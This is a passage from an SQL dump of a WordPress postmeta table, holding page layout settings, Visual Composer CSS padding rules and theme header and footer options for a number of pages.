!important;}'),(31942,1852,'_wp_page_template','full-width.php'),(31943,1852,'slide_template','default'),(31944,1852,'_wpb_vc_js_status','true'),(31945,1852,'mkdf_page_content_behind_header_meta','no'),(31946,1852,'mkdf_disable_vertical_header_background_image_meta','no'),(31947,1852,'mkdf_disable_header_widget_areas_meta','no'),(31948,1852,'mkdf_page_content_padding','0'),(31949,1852,'_dp_original','1836'),(31950,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31951,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31952,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31953,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31954,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31955,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31956,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31957,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31958,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31959,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31960,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31961,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31962,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31963,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31964,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31965,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31966,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31967,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31968,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31969,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31970,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(31971,1857,'_wp_page_template','full-width.php'),(31972,1857,'slide_template','default'),(31973,1857,'_wpb_vc_js_status','true'),(31974,1857,'mkdf_page_content_behind_header_meta','no'),(31975,1857,'mkdf_disable_vertical_header_background_image_meta','no'),(31976,1857,'mkdf_disable_header_widget_areas_meta','no'),(31977,1857,'mkdf_page_content_padding','0'),(31978,1857,'_dp_original','1852'),(31979,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31980,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(31981,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31982,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31983,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31984,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31985,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31986,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(31987,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(31988,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(31989,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(31990,3074,'_wp_page_template','full-width.php'),(31991,3074,'slide_template','default'),(31992,3074,'_wpb_vc_js_status','true'),(31993,3074,'mkdf_page_content_behind_header_meta','no'),(31994,3074,'mkdf_disable_vertical_header_background_image_meta','no'),(31995,3074,'mkdf_disable_header_widget_areas_meta','no'),(31996,3074,'mkdf_page_content_padding','120px 0 60px'),(31997,3074,'_dp_original','1382'),(31998,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31999,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32000,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32001,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32002,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32003,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32004,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32005,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32006,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32007,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32008,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32009,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32010,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(32011,1948,'_wp_page_template','full-width.php'),(32012,1948,'slide_template','default'),(32013,1948,'_wpb_vc_js_status','true'),(32014,1948,'mkdf_page_content_behind_header_meta','no'),(32015,1948,'mkdf_disable_vertical_header_background_image_meta','no'),(32016,1948,'mkdf_disable_header_widget_areas_meta','no'),(32017,1948,'mkdf_page_content_padding','105px 0 60px'),(32018,1948,'_dp_original','1904'),(32019,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32020,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32021,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32022,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32023,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32024,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32025,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32026,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32027,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32028,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32029,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32030,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32031,1995,'_wp_page_template','full-width.php'),(32032,1995,'slide_template','default'),(32033,1995,'_wpb_vc_js_status','true'),(32034,1995,'mkdf_page_content_behind_header_meta','no'),(32035,1995,'mkdf_disable_vertical_header_background_image_meta','no'),(32036,1995,'mkdf_disable_header_widget_areas_meta','no'),(32037,1995,'mkdf_page_content_padding','0'),(32038,1995,'_dp_original','1857'),(32039,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(32040,2019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32041,2019,'_wp_page_template','full-width.php'),(32042,2019,'slide_template','default'),(32043,2019,'_wpb_vc_js_status','true'),(32044,2019,'mkdf_page_content_behind_header_meta','no'),(32045,2019,'mkdf_disable_vertical_header_background_image_meta','no'),(32046,2019,'mkdf_disable_header_widget_areas_meta','no'),(32047,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(32048,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32049,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(32050,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32051,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32052,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32053,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32054,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(32055,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(32056,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(32057,2174,'_wp_page_template','full-width.php'),(32058,2174,'slide_template','default'),(32059,2174,'_wpb_vc_js_status','true'),(32060,2174,'mkdf_page_content_behind_header_meta','no'),(32061,2174,'mkdf_disable_vertical_header_background_image_meta','no'),(32062,2174,'mkdf_disable_header_widget_areas_meta','no'),(32063,2174,'mkdf_page_content_padding','120px 0'),(32064,2174,'_dp_original','1297'),(32065,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32066,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32067,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32068,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32069,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32070,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32071,2387,'_wp_page_template','full-width.php'),(32072,2387,'slide_template','default'),(32073,2387,'_wpb_vc_js_status','true'),(32074,2387,'mkdf_page_content_behind_header_meta','no'),(32075,2387,'mkdf_disable_vertical_header_background_image_meta','no'),(32076,2387,'mkdf_disable_header_widget_areas_meta','no'),(32077,2387,'mkdf_page_content_padding','120px 0 100px'),(32078,2387,'_dp_original','1382'),(32079,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32080,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32081,2419,'_wp_page_template','blog-standard'),(32082,2419,'slide_template','default'),(32083,2419,'_wpb_vc_js_status','false'),(32084,2419,'mkdf_page_content_behind_header_meta','no'),(32085,2419,'mkdf_blog_category_meta','recepies'),(32086,2419,'mkdf_show_posts_per_page_meta','5'),(32087,2419,'mkdf_sidebar_layout_meta','sidebar-25-left'),(32088,2419,'mkdf_disable_vertical_header_background_image_meta','no'),(32089,2419,'mkdf_disable_header_widget_areas_meta','no'),(32090,2419,'mkdf_page_content_padding','120px 0 100px'),(32091,2419,'_dp_original','1679'),(32092,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32093,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32094,2421,'_wp_page_template','blog-standard'),(32095,2421,'slide_template','default'),(32096,2421,'_wpb_vc_js_status','false'),(32097,2421,'mkdf_page_content_behind_header_meta','no'),(32098,2421,'mkdf_blog_category_meta','recepies'),(32099,2421,'mkdf_show_posts_per_page_meta','5'),(32100,2421,'mkdf_sidebar_layout_meta','no-sidebar'),(32101,2421,'mkdf_disable_vertical_header_background_image_meta','no'),(32102,2421,'mkdf_disable_header_widget_areas_meta','no'),(32103,2421,'mkdf_page_content_padding','120px 0 100px'),(32104,2421,'_dp_original','1679'),(32105,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32106,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32107,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32108,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32109,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32110,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32111,2435,'_wp_page_template','full-width.php'),(32112,2435,'slide_template','default'),(32113,2435,'_wpb_vc_js_status','true'),(32114,2435,'mkdf_page_content_behind_header_meta','no'),(32115,2435,'mkdf_disable_vertical_header_background_image_meta','no'),(32116,2435,'mkdf_disable_header_widget_areas_meta','no'),(32117,2435,'mkdf_page_content_padding','120px 0 0'),(32118,2435,'_dp_original','1742'),(32119,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32120,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32121,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32122,2448,'_wp_page_template','full-width.php'),(32123,2448,'slide_template','default'),(32124,2448,'_wpb_vc_js_status','true'),(32125,2448,'mkdf_page_content_behind_header_meta','no'),(32126,2448,'mkdf_page_content_padding','0 0 0 0 '),(32127,2448,'mkdf_page_content_padding_mobile','0 0 0 0'),(32128,2448,'mkdf_set_menu_area_position_meta','center'),(32129,2448,'mkdf_disable_vertical_header_background_image_meta','no'),(32130,2448,'mkdf_menu_area_background_color_meta','#ffffff'),(32131,2448,'mkdf_menu_area_background_transparency_meta','40%'),(32132,2448,'mkdf_disable_header_widget_areas_meta','no'),(32133,2448,'mkdf_show_title_area_meta','no'),(32134,2448,'mkdf_disable_footer_meta','yes'),(32135,2448,'mkdf_header_type_meta','header-standard'),(32136,2448,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(32137,2448,'mkdf_header_behaviour_meta','no-behavior'),(32138,2448,'_dp_original','1811'),(32139,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(32140,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32141,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32142,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32143,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32144,2457,'_wp_page_template','default'),(32145,2457,'slide_template','default'),(32146,2457,'_wpb_vc_js_status','true'),(32147,2457,'mkdf_page_content_behind_header_meta','no'),(32148,2457,'mkdf_page_content_padding','100px 0 120px 0'),(32149,2457,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(32150,2457,'mkdf_disable_vertical_header_background_image_meta','no'),(32151,2457,'mkdf_disable_header_widget_areas_meta','no'),(32152,2457,'mkdf_title_area_type_meta','attika'),(32153,2457,'_dp_original','1185'),(32154,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32155,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32156,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32157,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32158,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32159,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32160,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32161,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32162,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32163,2472,'_wp_page_template','full-width.php'),(32164,2472,'slide_template','default'),(32165,2472,'_wpb_vc_js_status','true'),(32166,2472,'mkdf_page_content_behind_header_meta','no'),(32167,2472,'mkdf_disable_vertical_header_background_image_meta','no'),(32168,2472,'mkdf_disable_header_widget_areas_meta','no'),(32169,2472,'mkdf_page_content_padding','120px 0 105px'),(32170,2472,'_dp_original','1662'),(32171,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(32172,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32173,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32174,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32175,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32176,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32177,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32178,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32179,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32180,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32181,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32182,2477,'_wp_page_template','full-width.php'),(32183,2477,'slide_template','default'),(32184,2477,'_wpb_vc_js_status','true'),(32185,2477,'mkdf_page_content_behind_header_meta','no'),(32186,2477,'mkdf_disable_vertical_header_background_image_meta','no'),(32187,2477,'mkdf_disable_header_widget_areas_meta','no'),(32188,2477,'mkdf_page_content_padding','120px 0 60px'),(32189,2477,'_dp_original','2472'),(32190,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32191,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(32192,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32193,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32194,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32195,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32196,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32197,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32198,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32199,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32200,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32201,2494,'_wp_page_template','full-width.php'),(32202,2494,'slide_template','default'),(32203,2494,'_wpb_vc_js_status','true'),(32204,2494,'mkdf_page_content_behind_header_meta','no'),(32205,2494,'mkdf_disable_vertical_header_background_image_meta','no'),(32206,2494,'mkdf_disable_header_widget_areas_meta','no'),(32207,2494,'mkdf_page_content_padding','110px 0 155px'),(32208,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(32209,2494,'_dp_original','2472'),(32210,2542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32211,2542,'_wp_page_template','full-width.php'),(32212,2542,'slide_template','default'),(32213,2542,'_wpb_vc_js_status','true'),(32214,2542,'mkdf_page_content_behind_header_meta','no'),(32215,2542,'mkdf_disable_vertical_header_background_image_meta','no'),(32216,2542,'mkdf_disable_header_widget_areas_meta','no'),(32217,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(32218,2542,'mkdf_page_content_padding','0'),(32219,2542,'mkdf_disable_header_meta','yes'),(32220,2542,'mkdf_show_title_area_meta','no'),(32221,2542,'mkdf_disable_footer_meta','yes'),(32222,2542,'mkdf_smooth_page_transitions_meta','yes'),(32223,2542,'mkdf_page_transition_preloader_meta','yes'),(32224,2542,'mkdf_smooth_pt_spinner_type_meta','pulse'),(32225,2542,'mkdf_smooth_pt_spinner_color_meta','#000000'),(32226,2542,'_wpb_post_custom_css','.mkdf-landing-homes-section {\n    display: none;\n}\n\n.mkdf-landing-bottom-section:after {\n    position: absolute;\n    left: 0;\n    bottom: 0;\n    z-index: -23;\n    width: 29%;\n    height: 476px;\n    background-color: #fef8f7;\n}\n'),(32227,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32228,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32229,2625,'_wp_page_template','default'),(32230,2625,'slide_template','default'),(32231,2625,'_wpb_vc_js_status','true'),(32232,2625,'mkdf_page_content_behind_header_meta','no'),(32233,2625,'mkdf_page_content_padding','120px 0 160px 0'),(32234,2625,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(32235,2625,'mkdf_disable_vertical_header_background_image_meta','no'),(32236,2625,'mkdf_disable_header_widget_areas_meta','no'),(32237,2625,'mkdf_title_area_type_meta','attika'),(32238,2625,'_dp_original','1151'),(32239,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32240,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32241,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32242,2627,'_wp_page_template','default'),(32243,2627,'slide_template','default'),(32244,2627,'_wpb_vc_js_status','true'),(32245,2627,'mkdf_page_content_behind_header_meta','no'),(32246,2627,'mkdf_page_content_padding','120px 0 170px 0'),(32247,2627,'mkdf_page_content_padding_mobile','120px 0 170px 